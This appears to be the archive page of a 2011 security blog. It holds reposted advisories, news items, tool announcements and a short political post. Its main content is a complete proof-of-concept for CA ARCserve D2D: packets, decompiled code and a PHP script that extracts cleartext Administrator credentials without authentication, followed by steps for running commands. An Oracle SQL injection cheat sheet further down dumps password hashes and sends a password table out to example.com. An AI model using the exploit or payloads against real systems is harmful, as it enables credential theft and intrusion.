Yep, after taking more than thousand frames i did understand that in M/P/S modes iso level stands on AUTO even if we are choosing it manually. BUG? Future? :) Not sure...
Well, only after choosing in menu setting to take off ISO Auto adjusting in all modes, except AUTO and predefined scenes , we can take care of ISO level as we wish.
NIKON ruleZZZ
Saturday, October 15, 2011
Tuesday, August 30, 2011
Monday, August 29, 2011
Friday, July 29, 2011
CA ARCserve D2D r15 GWT RPC Request Auth Bypass / Credentials Disclosure and Commands Execution PoC
original url: http://retrogod.altervista.org/9sg_ca_d2dii.html
<?php
/*
CA ARCserve D2D r15 GWT RPC Request Auth Bypass /
Credentials Disclosure and Commands Execution PoC
product homepage: http://arcserve.com/us/default.aspx
file tested: CA_ARCserve_D2D_Setup_BMR.zip
tested against: Microsoft Windows Server 2003 r2 sp2
This software installs a Tomcat HTTP server which listens
on port 8014 for incoming connections (this port is also
added automatically to firewall exceptions to exhacerbate
the vulnerability I am going to describe).
It uses a GWT RPC (Google Web Toolkit Remote Procedure
Call) mechanism to receive messages from the Administrator
browser.
Without prior authentication, a remote user with access
to the web server can send a POST request to the homepageServlet
serlvet containing the "getLocalHost" message and the correct
filename of a certain descriptor to disclose the
username and password of the target application.
This username and password pair are Windows credentials
with Administrator privileges, requested during
the ARCserve installation process (it clearly says this, an user
from the Administrators group).
This works with the mentioned software perfectly
installed and configured and after the Administrator user
logged in *one time each Tomcat session, logged out or not*
(which I think is easily exploitable against a production
service running twenty four hours a day). You could also choose
to resend the request indefinetely, waiting for the Administrator
to be logged in.
Example packet:
POST /contents/service/homepage HTTP/1.1
Content-Type: text/x-gwt-rpc; charset=utf-8
User-Agent: GoogleBot/2.1
Host: 192.168.0.1:8014
Content-Length: 149
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: donotshowgettingstarted=%7B%22state%22%3Atrue%7D
5|0|4|http://192.168.0.1:8014/contents/|2C6B33BED38F825C48AE73C093241510|com.ca.arcflash.ui.client.homepage.HomepageService|getLocalHost|1|2|3|4|0|
Note that '2C6B33BED38F825C48AE73C093241510' is a static value
which represents a filename of a gwt rpc descriptor which can be found inside the default path:
C:\Program Files\CA\ARCserve D2D\TOMCAT\webapps\ROOT\contents\2C6B33BED38F825C48AE73C093241510.gwt.rpc
Note also that this packet does not contain any session id.
Response packet:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Disposition: attachment
Content-Type: application/json;charset=utf-8
Content-Length: 480
Date: Wed, 13 Jul 2011 18:57:19 GMT
//OK[0,17,16,8,15,14,8,13,-3,12,11,8,10,9,8,7,0,6,5,0,4,3,8,2,1,1,["com.ca.arcflash.ui.client.model.TrustHostModel/1126245943",
"com.extjs.gxt.ui.client.data.RpcMap/3441186752","port","java.lang.Integer/3438268394","Selected","java.lang.Boolean/476441737",
"hostName","java.lang.String/2004016611","RGOD_9SG","uuid","1a580961-1aa7-4225-b3aa-a522649c16ec","type",
"user","Administrator","password","MY_PASSWORD","Protocol"],0,5] <--------------------
Clear text! Clear text!!!
Username -> Administrator
Password -> MY_PASSWORD
A remote attacker could then login to the affected application
then execute arbitrary commands with Administrator group privileges
in the following way:
Browse Backup settings;
Click Advanced tab;
Check "Run a command before backup is started";
Fill the white field with the desired command, ex. cmd /c start calc ;
Fill the credentials fields with the gained username and password
(you can use the same you had before);
Select an existing backup destination in the Protection Settings tab;
Browse to the main page and clicking "Backup Now";
Select Incremental Backup and press OK;
calc.exe is launched various times.
Other attacks are possible.
Vulnerable code and explaination:
web.xml :
...
<servlet>
<servlet-name>homepageServlet</servlet-name>
<servlet-class>com.ca.arcflash.ui.server.HomepageServiceImpl</servlet-class>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>homepageServlet</servlet-name>
<url-pattern>/contents/service/homepage</url-pattern>
</servlet-mapping>
...
the decompiled HomepageServiceImpl.class :
...
public TrustHostModel getLocalHost()
throws BusinessLogicException, ServiceConnectException, ServiceInternalException
{
try
{
TrustedHost trustedhost = getLocalWebServiceClient().getLocalHostAsTrust();
TrustHostModel trusthostmodel = ConvertToModel(trustedhost);
return trusthostmodel;
}
catch(AxisFault axisfault)
{
axisfault.printStackTrace();
}
return null;
}
...
the decompiled WebServiceClient.class :
...
public TrustedHost getLocalHostAsTrust()
throws AxisFault
{
Object aobj[] = invokeWebMethod("getLocalHostAsTrust", new Object[0], new Class[] { //<------------
com/ca/arcflash/webservice/data/TrustedHost
});
return (TrustedHost)aobj[0];
}
...
a request to the FlashServiceImpl Axis2 Web Service is originated
note that the ip address originating the request is 127.0.0.1 now!!!
So you are using the GWT RPC endpoint as a proxy for the mentioned
web service ...
from the decompiled FlashServiceImpl.class:
...
public TrustedHost getLocalHostAsTrust()
throws AxisFault
{
checkSession(); <--------------------
try
{
return CommonService.getInstance().getLocalHostAsTrust();
}
catch(Throwable throwable)
{
logger.error(throwable.getMessage(), throwable);
}
throw new AxisFault("Unhandled exception in web service", FlashServiceErrorCode.Common_ErrorOccursInService);
}
...
the checkSession() function is called but now I show you because it is bypassed,
again from the decompiled FlashServiceImpl.class:
...
private void checkSession()
throws AxisFault
{
if(!enableSessionCheck)
return;
MessageContext messagecontext = MessageContext.getCurrentMessageContext();
Object obj = messagecontext.getProperty(HTTPConstants.MC_HTTP_SERVLETREQUEST);
if(obj != null && (obj instanceof HttpServletRequest))
{
HttpServletRequest httpservletrequest = (HttpServletRequest)obj;
HttpSession httpsession = httpservletrequest.getSession(true);
if(checkLocalHost(httpservletrequest.getRemoteAddr(), true)) //<--------------------------------
return;
if(httpsession.getAttribute("com.ca.arcflash.webservice.FlashServiceImpl.UserName") == null && httpsession.getAttribute("com.ca.arcflash.webservice.FlashServiceImpl.UUID") == null)
throw new AxisFault("Service session timeout", FlashServiceErrorCode.Common_ServiceSessionTimeout);
}
}
...
the checkLocalHost() function is called, this check means
"if the ip address originating the request is localhost then
do not check the session but go on".
look to checkLocalHost() and to initializeIPList() functions inside FlashServiceImpl.class:
...
private boolean checkLocalHost(String s, boolean flag)
{
logger.debug((new StringBuilder()).append("checkLocalHost begin, host:").append(s).append(", localCall:").append(flag).toString());
if(localhostIPList == null)
initializeIPList();
if(s == null || s.length() == 0)
return false;
s = s.trim();
if(logger.isDebugEnabled())
{
logger.debug((new StringBuilder()).append("localhostIPList size:").append(localhostIPList.size()).toString());
String s1;
for(Iterator iterator = localhostIPList.iterator(); iterator.hasNext(); logger.debug((new StringBuilder()).append("LocalHost:").append(s1).toString()))
s1 = (String)iterator.next();
}
boolean flag1 = false;
Iterator iterator1 = localhostIPList.iterator();
do
{
if(!iterator1.hasNext())
break;
String s2 = (String)iterator1.next();
if(!s.equalsIgnoreCase(s2))
continue;
flag1 = true;
break;
} while(true);
logger.debug((new StringBuilder()).append("checkLocalHost end, isLocal:").append(flag1).toString());
return flag1;
}
private static synchronized void initializeIPList()
{
if(localhostIPList != null)
return;
localhostIPList = new ArrayList();
localhostIPList.add("localhost"); //<-------------------------
localhostIPList.add("127.0.0.1"); //<-------------------------
try
{
InetAddress inetaddress = InetAddress.getLocalHost();
String s = inetaddress.getHostAddress();
String s1 = inetaddress.getHostName();
if(s != null && !localhostIPList.contains(s))
localhostIPList.add(s);
if(s1 != null && !localhostIPList.contains(s1))
localhostIPList.add(s1);
String s2 = inetaddress.getCanonicalHostName();
if(s2 != null)
{
int i = s2.indexOf('.');
if(i > 0)
{
localhostIPList.add((new StringBuilder()).append("localhost").append(s2.substring(i)).toString());
localhostIPList.add(s2);
}
}
}
catch(Exception exception)
{
logger.error("InetAddress error:", exception);
}
try
{
Enumeration enumeration = NetworkInterface.getNetworkInterfaces();
if(enumeration != null)
while(enumeration.hasMoreElements())
{
NetworkInterface networkinterface = (NetworkInterface)enumeration.nextElement();
Enumeration enumeration1 = networkinterface.getInetAddresses();
while(enumeration1.hasMoreElements())
{
InetAddress inetaddress1 = (InetAddress)enumeration1.nextElement();
String s3 = inetaddress1.getHostAddress();
if(s3 != null && !localhostIPList.contains(s3))
localhostIPList.add(s3);
}
}
}
catch(Exception exception1)
{
logger.error("NetworkInterface error:", exception1);
}
}
...
a match is performed against the localhostIPList array then the web service
cannot know which is the real ip address of the remote user but thinks it is
127.0.0.1 !
again, from the decompiled HomepageServiceImpl.class :
...
private TrustHostModel ConvertToModel(TrustedHost trustedhost)
{
TrustHostModel trusthostmodel = new TrustHostModel();
trusthostmodel.setHostName(trustedhost.getName());
trusthostmodel.setPassword(trustedhost.getPassword());
trusthostmodel.setPort(Integer.valueOf(trustedhost.getPort()));
trusthostmodel.setType(Integer.valueOf(trustedhost.getType()));
trusthostmodel.setUser(trustedhost.getUserName());
trusthostmodel.setUuid(trustedhost.getUuid());
trusthostmodel.setProtocol(trustedhost.getProtocol());
trusthostmodel.setSelected(Boolean.valueOf(false));
return trusthostmodel;
}
...
this prepares the output, returning the object properties previously used to store the
admin credentials.
The following code can be used to disclose them, you can perform post-auth commands
execution by browsing the target application and act as described.
rgod
*/
error_reporting(E_ALL ^ E_NOTICE);
set_time_limit(0);
$err[0] = "[!] This script is intended to be launched from the cli!";
$err[1] = "[!] You need the curl extesion loaded!";
if (php_sapi_name() <> "cli") {
die($err[0]);
}
function syntax() {
print("usage: php 9sg_ca_d2d.php [ip_address]\r\n" );
die();
}
$argv[1] ? print("[*] Attacking...\n") :
syntax();
if (!extension_loaded('curl')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
false;
if ($win) {
!dl("php_curl.dll") ? die($err[1]) :
print("[*] curl loaded\n");
} else {
!dl("php_curl.so") ? die($err[1]) :
print("[*] curl loaded\n");
}
}
function _s($url, $is_post, $ck, $request) {
global $_use_proxy, $proxy_host, $proxy_port;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
if ($is_post) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
}
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
"Cookie: donotshowgettingstarted=%7B%22state%22%3Atrue%7D;".$ck ,
"Content-Type: text/x-gwt-rpc; charset=utf-8;"
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Jakarta Commons-HttpClient/3.1");
curl_setopt($ch, CURLOPT_TIMEOUT, 0);
if ($_use_proxy) {
curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port);
}
$_d = curl_exec($ch);
if (curl_errno($ch)) {
//die("[!] ".curl_error($ch)."\n");
} else {
curl_close($ch);
}
return $_d;
}
$host = $argv[1];
$port = 8014;
$rpc='5|0|4|http://".$host.":8014/contents/|2C6B33BED38F825C48AE73C093241510|com.ca.arcflash.ui.client.homepage.HomepageService|getLocalHost|1|2|3|4|0|';
$url = "http://$host:$port/contents/service/homepage";
$out = _s($url, 1, "", $rpc);
if (strpos($out,"The call failed on the server;") or (!strpos($out,"200 OK"))){
print("[!] Error, maybe patched or admin never logged in. See output...\n");
print($out);
}
else {
$temp=explode("\"user\",\"",$out);$temp=explode("\"",$temp[1]);$usr=trim($temp[0]);
print("Username: ".$usr."\n");
$temp=explode("\"password\",\"",$out);$temp=explode("\"",$temp[1]);$pwd=trim($temp[0]);
print("Password: ".$pwd."\n");
}
?>
Sunday, May 8, 2011
Monday, April 25, 2011
Very usefull resource for Z-days.
Thanks and Credits to http://80vul.com/#
Thursday, April 21, 2011
Using tor in backtrack 4 R2
Step 1 :
Make sure tor and privoxy are installed.
apt-get install tor privoxyStep 2 :
nano /etc/privoxy/configAppend the following line to the file.
forward-socks4a / localhost:9050 .Step 3 :
/etc/init.d/privoxy start
/etc/init.d/tor startStep 4 :
Install tor button on firefox
https://addons.mozilla.org/zh-TW/firefox/addon/torbutton/Go to Tor Button perference and set as the following.
Select "
Use custom proxy settings"HTTP Proxy : 127.0.0.1 Port : 8118
SSL Proxy : 127.0.0.1 Port : 8118
SOCKS host : 127.0.0.1 Port : 9050Step 5 :
Click on the "
Tor enable" at the right bottom of the Firefox to enable the Tor Button.Hints : You should repeat the Step 3 and Step 5 when you are using Tor to surf the internet next time.
Saturday, March 26, 2011
Friday, March 25, 2011
Cyber attacks on US federal networks on the rise
The number of cyber attacks against federal government systems and networks has increased nearly 40 percent, says in the annual report on federal cybersecurity efforts compiled by the Office of Management Budget.The concrete number of attacks suffered in 2010 is 41,776, which is a marked increase from the 30,000 attacks executed in 2009. The statistic has been provided by the US-CERT, and a breakdown of the number according to type of attack goes like this:
- Malicious code - 12,864 (31%)
- Under investigation or labeled as "other - 11,336 (27%)
- Denial of service, unauthorized and/or attempted access, improper usage and scans probes, etc. - 17,576 (42%).
According to the Federal Times, US-CERT has pointed out that the attackers often try to leverage zero-day vulnerabilities in various apps and products to gain access to federal networks.
Most government agencies could and should do a better job when it comes to protecting their networks. Shockingly, 8 percent of the agencies still doesn't have an around-the-clock program for monitoring intrusions. And among those that do, the continuity of monitoring leaves much to be desired.
Thursday, March 24, 2011
URGENT!!!
THIS IS AN ANNOUNCEMENT TO ALL OF MY NON-ISRAELI FRIENDS: in the last 72 hours, more than 70 rockets where shot by Hamas organization into Israel, probably Israel will have to react soon- probably it's gonna get ugly- PROBABLY you'll hear about it for the first time few days later when the biased media in your country will present Israel again as a cruel aggressive country.
Sunday, March 20, 2011
Saturday, March 12, 2011
VOIP Penetration Testing
Thanks V.Unic - putted my attention on the article.
Thanks back-track. Shai Rod for very interesting material.
http://www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP
Thanks back-track. Shai Rod for very interesting material.
http://www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP
Sunday, March 6, 2011
Thursday, February 24, 2011
Saturday, February 12, 2011
Microsoft Windows Picture and Fax Viewer Library
Taken from http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=890
I. BACKGROUND
The Windows Picture and Fax Viewer "shimgvw.dll" library is used by Windows Explorer to generate thumbnail previews for media files.
II. DESCRIPTION
Remote exploitation of a buffer overflow vulnerability in multiple versions of Microsoft Corp.'s Windows could allow attackers to execute arbitrary code on the targeted host.
An integer overflow vulnerability exists in the "shimgvw" library. During the processing of an image within a certain function, a bitmap containing a large "biWidth" value can be used to cause an integer calculation overflow. This condition can lead to the overflow of a heap buffer and may result in the execute arbitrary code on the targeted host.
An integer overflow vulnerability exists in the "shimgvw" library. During the processing of an image within a certain function, a bitmap containing a large "biWidth" value can be used to cause an integer calculation overflow. This condition can lead to the overflow of a heap buffer and may result in the execute arbitrary code on the targeted host.
III. ANALYSIS
Exploitation could allow attackers to execute arbitrary code on the targeted host under the privileges of the current logged-on user. Successful exploitation would require the attacker to entice his or her victim into viewing a specially-crafted thumbnail leveraging the vulnerability.
Some vectors of attack include e-mail, the browser and network shares. In an e-mail-based attack, the attacker must entice his or her victim into opening or previewing a specially-crafted Office document containing a specially-crafted thumbnail. In a browser-based attack, the victim must simply view a maliciously crafted website. In a network share attack, such as UNC or WebDAV, an attacker would require the victim to simply navigate to the folder containing the crafted thumbnail.
Some vectors of attack include e-mail, the browser and network shares. In an e-mail-based attack, the attacker must entice his or her victim into opening or previewing a specially-crafted Office document containing a specially-crafted thumbnail. In a browser-based attack, the victim must simply view a maliciously crafted website. In a network share attack, such as UNC or WebDAV, an attacker would require the victim to simply navigate to the folder containing the crafted thumbnail.
IV. DETECTION
iDefense has confirmed the existence of this vulnerability in Microsoft Windows XP SP3. A full list of vulnerable Microsoft products can be found in Microsoft Security Bulletin MS11-006.
V. WORKAROUND
Microsoft has included an automated Microsoft Fix it solution for the Modify the Access Control List (ACL) on shimgvw.dll workaround, which can be found at the following link:
VI. VENDOR RESPONSE
Microsoft Corp. has released patches which address this issue. Information about downloadable vendor updates can be found by clicking on the URLs shown.
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2010-3970 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.
VIII. DISCLOSURE TIMELINE
01/12/2011 Initial Vendor Notification
01/12/2011 Initial Vendor Reply
02/08/2011 Coordinated Public Disclosure
01/12/2011 Initial Vendor Reply
02/08/2011 Coordinated Public Disclosure
IX. CREDIT
This vulnerability was reported to iDefense by Kobi Pariente and Yaniv Miron.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright � 2011 iDefense, Inc.
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customer service for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customer service for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
http://magazine.hackinthebox.org/index.html
Issue #5 is now available!
A very Happy New Year and a warm welcome to Issue 05 - The first HITB Magazine release for 2011
Saturday, February 5, 2011
Friday, January 21, 2011
VAST Live Distro beta 2.77
VAST is a VIPER Lab live distribution that contains VIPER developed tools such as UCsniff, videojak, videosnarf and more. Along with VIPER tools and other essential VoIP security tools, it also contains tools penetration testers utilize such as Metasploit, Nmap, and Hydra.This distribution is a work in progress. If you would like to see a tool or package included please feel free to suggest them and I will do what I can to make it happen. VAST also has built into synaptic package manager a third party repository link for the VIPER tools, so when we update a tool it's as easy as "apt-get".VAST beta 2.74 has been released with UCSniff 3.0 which includes GUI interface, VoIP video realtime monitoring, TFTP MitM modification of IP phone features, Gratuitous ARP disablement bypass support, and support for several compression codecs. The new VAST also has a new look as well.
http://vipervast.sourceforge.net/
http://vipervast.sourceforge.net/
Thursday, January 20, 2011
Researchers turn USB cable into attack tool
Two researchers have figured out a way to attack laptops and smartphones through an innocent-looking USB cable.
Angelos Stavrou, an assistant professor of computer science at George Mason University, and student Zhaohui Wang wrote software that changes the functionality of the USB driver so that they could launch a surreptitious attack while someone is charging a smartphone or syncing data between a smartphone and a computer.
Basically, the exploit works by adding keyboard or mouse functionality to the connection so an attacker can then start typing commands or click the mouse in order to steal files, download additional malware, or do other things to take control of the computer, Stavrou told CNET in an interview. The exploit is enabled because the USB protocol can be used to connect any device to a computing platform without authentication, he said.
He and his partner were scheduled to demonstrate an attack at the Black Hat DC conference today.
The exploit software they wrote identifies what operating sysetm is running on the device the USB cable is connected to. On Macintosh and Windows machines, a message pops up saying the system has detected a new human interface device, but there is no easily recognizable way to halt the process, Stavrou said. The Mac pop-up can be quickly removed by an attacker with a command sent via the smartphone so the laptop owner may not even see it, while the Windows pop-up lasts only one or two seconds in the lower left corner, making that an ineffective warning too, he said.
Linux machines offer no warning, so users will have no idea that something out of the ordinary is happening, particularly since the regular keyboard and mouse continue to function normally during an attack, Stavrou said.
"The operating system should present a pop-up and ask if the user really wants to connect the device" and specify what type of device is being identified to the system, he said.
The researchers wrote the exploit for Android devices only at this point. "It can be done for iPhone, but we didn't do it yet," Stavrou said. "It can work on any computing device that uses USB," and it can work between two smartphones by connecting a USB cable between then, he said.
"Say your computer at home is compromised and you compromise your Android phone by connecting them," he said. "Then, whenever you connect the smartphone to another laptop or computing device I can take over that computer also, and then compromise other computers off that Android. It's a viral type of compromise using the USB cable."
The original compromise can happen by downloading the exploit from the Web or running an app that is compromised. The researchers have created exploit software to run on a computer, and an exploit to run on Android that is a modification of the Android operating system kernel. Scripts can then be written for the actual attack.
Antivirus software wouldn't necessarily stop this because it can't tell that the activities of the exploit are not controlled or sanctioned by the user, Stavrou said. "It's hard to separate good behavior from bad behavior when it comes from the keyboard," he said.
There's not much a person can do to protect against this at this time, according to Stavrou. The operating systems should have the capability for devices to inspect USB traffic and alert users about what exactly is happening over the connection and give them the option of refusing an action, he said.
Read more: http://news.cnet.com/8301-27080_3-20028919-245.html#ixzz1BeJL6c6x
Wednesday, January 12, 2011
SAP Management Console Information Disclosure
It has been detected that many of the available methods in the sapstartsrv SOAP server do not require user authentication, allowing remote and
unauthenticated users to obtain sensitive information from the SAP system, such as the list of log files and their content, profile parameters,
developer traces, etc.
Furthermore, some of the unauthenticated methods perform security sensitive operations that may impact over the integrity, confidentiality and/or
availability of the SAP system.
Technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their
systems and protect against the exploitation of the described vulnerability.
- - Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-002
unauthenticated users to obtain sensitive information from the SAP system, such as the list of log files and their content, profile parameters,
developer traces, etc.
Furthermore, some of the unauthenticated methods perform security sensitive operations that may impact over the integrity, confidentiality and/or
availability of the SAP system.
Technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their
systems and protect against the exploitation of the described vulnerability.
- - Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-002
HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code
Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). The vulnerabilities could be exploited remotely to execute arbitrary code under the context of the user running the web server.
References: CVE-2011-0261 (ZDI-CAN-753)
Thanks: bugtraq@securityfocus.com
References: CVE-2011-0261 (ZDI-CAN-753)
Thanks: bugtraq@securityfocus.com
SAP Management Console Unauthenticated Service Restart
A Denial of Service vulnerability has been discovered in the processing of administration commands by the SAP MC. This functionality allows the
restart of the service without providing authentication information.
Technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their
systems and protect against the exploitation of the described vulnerability.
- - Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-001
restart of the service without providing authentication information.
Technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their
systems and protect against the exploitation of the described vulnerability.
- - Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-001
Friday, January 7, 2011
Katana: Portable Multi-Boot Security Suite
Katana 2.0
Katana is a portable multi-boot security suite which brings together many of today's best security distributions and portable applications to run off a single Flash Drive. It includes distributions which focus on Pen-Testing, Auditing, Forensics, System Recovery, Network Analysis, and Malware Removal. Katana also comes with over 100 portable Windows applications; such as Wireshark, Metasploit, NMAP, Cain & Abel, and many more. http://www.hackfromacave.com/katana.html#katana_installation
Tuesday, January 4, 2011
ORACLE SQL Injection Cheat Sheet
From http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/
Yorumunu Ekle - 
Yazıcı Versiyonu - 
Yorumlar için RS
- ORACLE SQL Injection Notes
- Strings without Quotes
- Getting Stuff
- Simple Union Query
- Simulating SQL Server's TOP feature
- Moving Records one by one
- Functions useful for Blind SQL Injection
- Doing outbound connections
- References, Credits, Thanks & Document History
Introduction
Quick and Dirty ORACLE SQL Injection Cheat Sheet which will be combined with main SQL Injection Cheat Sheet eventually. This cheat sheet can help you to get started for basic ORACLE SQL Injections.
ORACLE SQL Injection Notes
In ORACLE you can not just SELECT stuff you have to SELECT them from some table. For this purpose you can use special table called DUAL.
i.e. SELECT 'dummydata' || 'x' FROM DUAL;
You have to close comments if you used /* comment */ style comments
Concatenation
SELECT utl_raw.concat('x','y') FROM DUAL; SELECT 'x' || 'y' FROM DUAL; SELECT 'a' || 'b' FROM DUAL; SELECT user || '-' || password FROM members;
Comments
/* comment */
Note : You have to close this comments properly otherwise you'll get syntax error.
Line comment : --
Line comment : --
Casting
For most of the data types concatenating data with a string can do the casting automatically. SELECT 1 || 'a' FROM DUAL;
Strings without quotes
SELECT chr(110) || chr(111) FROM DUAL;
OR
SELECT utl_raw.cast_to_varchar2(TO_CHAR(110)) FROM DUAL;
OR
SELECT utl_raw.cast_to_varchar2(TO_CHAR(110)) FROM DUAL;
Getting Stuff
Getting Tables
SELECT table_name FROM all_tables WHERE TABLESPACE_NAME='USERS'
Getting Columns
SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME'
Getting Current Database Name
SELECT global_name FROM global_name
Getting Users and Passwords
SELECT name, password FROM sys.user$ where type#=1
Getting version
Select banner || '-' || (select banner from v$version where banner like 'Oracle%') from v$version where banner like 'TNS%'
Getting Current User
SELECT user FROM dual
Simple Union Query
Simulating SQL Server's TOP feature
SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R <= 3;
Moving Records one by one
SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R = 3;
Functions useful for Blind SQL Injetion
- BEGIN DBMS_LOCK.SLEEP(5); END; - Sleep for 5 seconds
- CHR() - Convert to Char
- ASCII() - Convert to ASCII
- SUBSTR() - Substring
- BITAND() - Bit And operation
- LOWER() - Convert to LowerCase
Doing outbound connections
- SELECT utl_http.request('http://www.example.com') FROM DUAL SELECT utl_http.request('http://www.example.com/?' || (SELECT pass FROM members) ) FROM DUAL
- SELECT HTTPURITYPE('http://www.example.com').getXML() FROM DUAL;
You can test blind SQL Injection from DNS requests (can be more reliable against egress filtering) or from actual web request.
References, Papers & Credits
- Thanks to Pentestmonkey, Notsosecure, Alexander Kornbrust
- SQL Injection Attacks for ORACLE Developers
- Red Database Security Papers
- SQL Injection Cheat Sheet
Document History
- 02/10/2007 - Public Release
- 02/10/2007 - Getting passwords section and utl_http replaced with new and easier ones. Thanks to Alexander Kornbrust
- 09/10/2007 - Sleep function added
Yorumunu Ekle - Yazıcı Versiyonu - Yorumlar için RSMonday, January 3, 2011
Presentations and documents on Russian cybercrime, hacking and information warfare
Thanks to Niels Groeneveld
http://www.linkedin.com/profile/view?id=1959881&authType=name&authToken=r4Y7&trk=mp_view_prf_t
Presentations and documents on Russian cybercrime, hacking and information warfare
[2000]
Russian View on Information War
http://fmso.leavenworth.army.mil/documents/Russianvuiw.htm
[2001]
Attitudes towards computer hacking in Russia
http://www.cs.kau.se/~stefan/IW/CC_4-5.pdf
Cyberwarfare: An Analysis of the Mean and Motivations of Selected Nation States
http://www.ists.dartmouth.edu/docs/cyberwarfare.pdf
Inside Russia's Hacking Culture
http://www.wired.com/culture/lifestyle/news/2001/03/42346
Russian organized crime, Russian hacking, and US. security
http://www.cert.org/research/isw/isw2001/papers/Williams-06-09.pdf
[2002]
Russia and the Information Revolution
http://www.rand.org/pubs/issue_papers/2005/IP229.pdf
[2004]
Comparing US, Russian and Chinese IO Concepts
http://www.dodccrp.org/events/2004_CCRTS/CD/papers/064.pdf
Russian and ChineseInformation Warfare: Theory and Practice
http://www.dodccrp.org/events/2004_CCRTS/CD/presentations/064.pdf
[2005]
Hacking in a Foreign Language: A Network Security Guide to Russia
http://web.archive.org/web/20050407230309/http://www.blackhat.com/presentations/bh-europe-05/bh-eu-05-geers-up.pdf
Russia: Organized Cybercrime
http://dc214.defcon.org/notes/june_2005/dc214_sn_orgcrime.ppt.
Organized Crime and the Rule of Law in the Russian Federation
http://projects.essex.ac.uk/ehrr/V2N1/Orlova.pdf
[2006]
Access to Information in Russia
http://www.transparency.org.ru/doc/ACCESS_TO_INFORMATION_IN_RUSSIA_2006_01252_6.doc
[2007]
Cyber Attacks on Estonia - Short Synopsis
http://doubleshotsecurity.com/pdf/NANOG-eesti.pdf
Estonia vs. Russia - The DDOS War
http://www.cis.uab.edu/forensics/blog/Estonian.DDOS.pdf
Estonian Cyber Attacks 2007
http://meeting.afrinic.net/afrinic-11/slides/aaf/Estonia_cyber_attacks_2007_latest.pdf
Global Threat Research Report: Russia
http://www.verisign.com/static/042139.pdf
Lessons Learned from the Russian-Estonian Cyber-Conflict
http://lacnic.net/documentos/ixp/woodcock-caso_estonia.pdf
Russian Business Network Study
http://www.bizeul.org/files/RBN_study.pdf
Russian plans for development of Information Society
http://blog.icann.org/2007/10/russian-plans-for-development-of-information-society/
Tracking the Russian Business Network
http://www.cl.cam.ac.uk/research/security/seminars/archive/slides/2007-12-11.pdf
Webwar One: The Botnet Attack on Estonia
http://www.wired.com/images/press/pdf/webwarone.pdf
[2008]
An In-Depth Look at the Georgia-Russia Cyber Conflict of 2008
http://www.shadowserver.org/wiki/uploads/Shadowserver/BTF8_RU_GE_DDOS.pdf
Cyberattacks against Georgia: Legal Lessons Identified
http://www.carlisle.army.mil/DIME/documents/Georgia%201%200.pdf
Estonia: Information Warfare and Lessons Learned
http://ec.europa.eu/information_society/policy/nis/docs/largescaleattacksdocs/s5_gadi_evron.pdf
Political DDOS: Estonia and Beyond
http://www.usenix.org/events/sec08/tech/slides/nazario-slides.pdf
Propaganda, Information War and the Estonian-Russian Treaty Relations: Some Aspects of International Law
http://www.juridicainternational.eu/public/pdf/ji_2008_2_154.pdf
Russia: Economics, not Mafia fuel Malware
http://www.mcafee.com/us/local_content/reports/sage_russia_2008.pdf
Russia/Georgia Cyber War – Findings and Analysis
http://blog.refractal.org/wp-content/uploads/2008/10/2i7t2qyiwv0g63e7l3g.pdf
Russian Cyberwar on Georgia
http://georgiaupdate.gov.ge/doc/10006881/Microsoft%20Word%20-%20CYBERWAR%20short%20version_111008.pdf
The Information Revolution and Information Security Problems in Russia
http://www.au.af.mil/info-ops/iosphere/08special/iosphere_special08_tsygichko.pdf
http://www.linkedin.com/groupItem?view=&srchtype=discussedNews&gid=2708813&item=35360162&type=member&trk=EML_anet_ac_pst_ttle
Subscribe to:
Posts (Atom)